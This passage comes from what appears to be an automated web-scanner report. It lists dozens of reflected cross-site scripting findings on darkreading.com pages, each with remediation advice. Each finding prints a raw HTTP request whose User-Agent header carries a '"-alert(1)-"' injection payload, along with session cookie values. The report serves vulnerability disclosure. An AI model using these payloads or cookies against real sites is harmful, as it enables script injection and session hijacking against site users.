Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/223800139/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)61a18"-alert(1)-"8f107851f0f
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fd2c"-alert(1)-"29fa8ae568e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/223800256/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3fd2c"-alert(1)-"29fa8ae568e
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 481d7"-alert(1)-"196e4c1034a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/224200523/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)481d7"-alert(1)-"196e4c1034a
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8d84"-alert(1)-"ca663d22ab8 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/224201355/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f8d84"-alert(1)-"ca663d22ab8
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 659a0"-alert(1)-"6c7aaa80bc7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/224500077/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)659a0"-alert(1)-"6c7aaa80bc7
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec046"-alert(1)-"32d910e9b7c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/224600304/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ec046"-alert(1)-"32d910e9b7c
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28f01"-alert(1)-"a8ae94a3c30 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash could be used to make another user's browser issue a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/224700541/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)28f01"-alert(1)-"a8ae94a3c30
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e804d"-alert(1)-"8b4d603cb19 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/224900081/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e804d"-alert(1)-"8b4d603cb19
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f518"-alert(1)-"82062d11eec was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/225200571/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4f518"-alert(1)-"82062d11eec
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d91e6"-alert(1)-"98f2f4f92f3 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/225600438/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d91e6"-alert(1)-"98f2f4f92f3
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19a27"-alert(1)-"8c7a8cabc3e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/225700088/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)19a27"-alert(1)-"8c7a8cabc3e
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9809c"-alert(1)-"b3bb2c41222 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/225701534/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9809c"-alert(1)-"b3bb2c41222
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd857"-alert(1)-"3b198c1bf5f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/225701866/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fd857"-alert(1)-"3b198c1bf5f
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c59a4"-alert(1)-"4052edbc9fc was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/225702192/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c59a4"-alert(1)-"4052edbc9fc
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a31da"-alert(1)-"d032b2086d1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/225702468/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a31da"-alert(1)-"d032b2086d1
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65634"-alert(1)-"3aabd81b0f5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/225702839/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)65634"-alert(1)-"3aabd81b0f5
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c121"-alert(1)-"f331211b6fb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/226600195/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2c121"-alert(1)-"f331211b6fb
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ab0c"-alert(1)-"0933108224c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/226700229/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5ab0c"-alert(1)-"0933108224c
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 226f7"-alert(1)-"229f4ad6156 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/226700529/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)226f7"-alert(1)-"229f4ad6156
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83dc8"-alert(1)-"3c2f592cbdb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/226900007/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)83dc8"-alert(1)-"3c2f592cbdb
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85915"-alert(1)-"0900b168360 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/227300150/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)85915"-alert(1)-"0900b168360
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed7b4"-alert(1)-"b1ad7ed7286 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/227500152/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ed7b4"-alert(1)-"b1ad7ed7286
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31126"-alert(1)-"e2f4c8c43ff was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/attacks-breaches HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)31126"-alert(1)-"e2f4c8c43ff
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31954"-alert(1)-"89421c1061c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/client-security HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)31954"-alert(1)-"89421c1061c
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b6a0"-alert(1)-"4fb33c0f810 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/encryption HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7b6a0"-alert(1)-"4fb33c0f810
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7fe1"-alert(1)-"f3677b08217 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/nac HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d7fe1"-alert(1)-"f3677b08217
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bfdc"-alert(1)-"ff1a6d8986 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/perimeter-security HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9bfdc"-alert(1)-"ff1a6d8986
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ca8b"-alert(1)-"2494c33683d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
